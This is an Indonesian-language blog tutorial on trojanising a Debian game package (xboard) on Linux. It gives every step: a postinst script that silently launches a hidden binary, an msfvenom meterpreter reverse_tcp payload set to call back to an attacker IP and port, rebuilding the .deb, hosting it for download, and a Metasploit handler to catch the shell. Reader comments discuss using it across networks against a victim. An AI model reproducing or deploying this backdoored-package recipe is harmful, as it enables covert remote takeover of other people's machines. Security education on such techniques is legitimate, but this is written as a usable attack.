• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

How to Hack Linux Using Metasploit !

March 7, 2017 by Jack Wilder 4 Comments

Oke kali ini kita akan membahas kembali mengenai Metasploit. Sebelumnya kita sudah membahas payload PHP yang bisa digunakan untuk meretas sistem linux, kali ini akan sedikit berbeda. Oke langsung saja kita mulai.

A. Pengertian
Mungkin dari beberapa pembaca disini sudah mengetahui apa itu metasploit,

B. Latar Belakang
Banyak orang bilang bahwa linux itu aman dari virus, saya sendiri awalnya juga menganggap seperti itu,disini saya akan sedikit berbagi mengenai How to hack linux using Metasploit !.

C. Tahap Pelaksanaan

  1. Sebelum mengikuti tutorial sebaiknya anda memakai os Linux (Direkomendasikan Memakai Os Pentest seperti Backbox,Kali Linux,dll)
  2. Disini saya memanfaatkan VMware sebagai tumbalnya
  3. Tentunya ada koneksi internet yang nanti untuk mendownload sebuah Package
  4. Buka terminal anda dan masukin perintah seperti dibawah ini

    root@linuxsec:~# apt-get –download-only install xboard

  5. Setelah itu buatlah sebuah folder di tmp dengan memasukan perintah seperti dibawah ini

    root@linuxsec:~# mkdir /tmp/linuxsec

  6. Lalu pindahkan package xboard ke folder yang baru saja tadi dibuat, seperti dibawah ini

    root@linuxsec:~# mv /var/cache/apt/archives/xboard_4.7.3-1_amd64.deb /tmp/linuxsec

  7. Setelah itu masuk ke folder yang baru saja di buat,masukan perintah seperti ini

    root@linuxsec:/tmp/linuxsec# dpkg -x xboard_4.7.3-1_amd64.deb gamerat
    root@linuxsec:/tmp/linuxsec# mkdir gamerat/DEBIAN

  8. Masuk ke folder DEBIAN lalu buat file “control” dan isilah file tersebut seperti dibawah ini

    Package: Xboard
    Version: 1.0.0
    Section: Games and Amusement
    Priority: optional
    Architecture: i386
    Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
    Description: Mohon Bersabar Ini Ujian

    note : Description bisa anda ubah
     

  9. Kalau sudah buatlah file lagi yaitu “postinst”, dan isi filenya seperti dibawah ini

    #!bin/sh
    sudo chmod 2755 /usr/games/xboard_nilai && /usr/games/xboard_nilai & /usr/games/xboard &

  10. Setelah itu kita buat payloadnya,masukan perintah seperti dibawah ini

    root@linuxsec:~# msfvenom -a x86 –platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.117.1 LPORT=1337 -b “x00” -f elf -o /tmp/linuxsec/gamerat/usr/games/xboard_nilai

    note : ubah path yang saya kasih warna merah dengan path anda, dan ubah ip sama port yang saya kasih warna hijau sesuai konfigurasi awal anda

  11. Setelah itu kasih hak akses dan build package tersebut, dengan memasukan perintah seperti dibawah ini

    root@linuxsec:~# cd /tmp/linuxsec/gamerat/DEBIAN
    root@linuxsec:/tmp/linuxsec/gamerat/DEBIAN# chmod 755 postinst
    root@linuxsec:/tmp/linuxsec/gamerat/DEBIAN# cd /tmp/linuxsec/
    root@linuxsec:/tmp/linuxsec/# dpkg-deb –build gamerat 

  12. Setelah itu copy trojannya taruh di /var/www atau /var/www/html
  13. Trojan kita sudah jadi sekarang anda eksekusi filenya di VMware Dan Meremotenya,,caranya gimana ?
  14. Installah terlebih dahulu gufw < pengertian dan cara penggunaan anda bisa cari di google
  15. Lalu buka Terminal anda ketikan perintah seperti dibawah ini

    msf > use exploit/multi/handler
    msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
    payload => linux/x86/meterpreter/reverse_tcp
    msf exploit(handler) > set lhost 172.16.117.1
    lhost => 172.16.117.1
    msf exploit(handler) > set lport 1337
    lport => 1337
    msf exploit(handler) > exploit

  16. Setelah itu di OS Guest(Os linux yang dijadikan tumbal ,sudah terinstall di vmware)
  17. Masuk ke OS Guest Guset tersbut dan download file anda, dengan memasukan perintah seperti berikut

    wget http://172.16.117.1/gamerat.deb

  18. Masih di Os Guest > eksekusi filenya dengan memamuskan perintah

    root@guestos:/home/guestos# chmod +x gamerat.deb
    root@gusetos:/home/guestos# dpkg -i gamerat.deb

  19. Lihat apa yang terjadi di metasploit console anda di Os Host

Kalu muncul seperti gambar dibawah ini berarti anda sukses mengikuti tutorial seperti diatas

Kalau anda masih belum paham dengan tutorial diatas anda bisa melihat video di bawah ini


Shares

Filed Under: Uncategorized Tagged With: Exploit, Metasploit

Reader Interactions

Comments

  1. cidark zone says

    March 15, 2017 at 11:56 am

    klo beda jaringan gimanaa?

    Reply
    • chiaki says

      March 27, 2017 at 1:19 am

      sama aja. cuma ip harus publik

      Reply
  2. coin saya says

    December 21, 2017 at 11:18 am

    ini seperti kita naruh backdoor kemudian korban di suruh ngeksekusi backdoor tersebut ya?

    Reply

Trackbacks

  1. How to Hack Linux Using Metasploit ! – Black Illusion Security says:
    September 27, 2018 at 11:11 am

    […] Content retrieved from: https://exploit.linuxsec.org/howtohack-linux-using-metasploit-par/. […]

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Uptimerobot.com Custom Domain or Subdomain Takeover

CVE-2019-13360 – CentOS Control Web Panel Authentication Bypass

Deface WordPress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability

Hack Targeted Website using Reverse IP

Zendesk Custom Domain or Subdomain Takeover

RCE pada Redis via Master-Slave Replication

Shopify Custom Domain or Subdomain Takeover

DNS Hijacking through Social Engineering

Mass Deface setelah Rooting Server

GitHub Custom Domain or Subdomain Takeover

LinuxSec / 73 queries in 0.10 seconds